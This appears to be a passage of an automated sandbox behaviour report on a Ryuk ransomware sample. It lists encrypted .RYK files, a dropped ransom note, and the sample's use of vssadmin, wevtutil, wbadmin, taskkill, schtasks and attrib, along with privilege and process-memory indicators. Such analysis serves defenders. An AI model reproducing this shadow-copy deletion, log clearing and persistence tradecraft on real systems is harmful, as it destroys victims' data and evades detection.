File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21320_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl C:\Windows\system32\wbadmin.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 928 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 868 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 868 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 868 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 928 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 460 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 460 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 460 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 516 wrote to memory of 652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 516 wrote to memory of 652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 516 wrote to memory of 652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 928 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 568 wrote to memory of 1452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 568 wrote to memory of 1452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 568 wrote to memory of 1452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 928 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1188 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1188 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1188 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 928 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1964 wrote to memory of 1876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1964 wrote to memory of 1876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1964 wrote to memory of 1876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 928 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1768 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1768 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1768 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 928 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1544 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1544 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 928 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1604 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1604 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1604 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1604 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1604 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1604 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1100 wrote to memory of 1480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
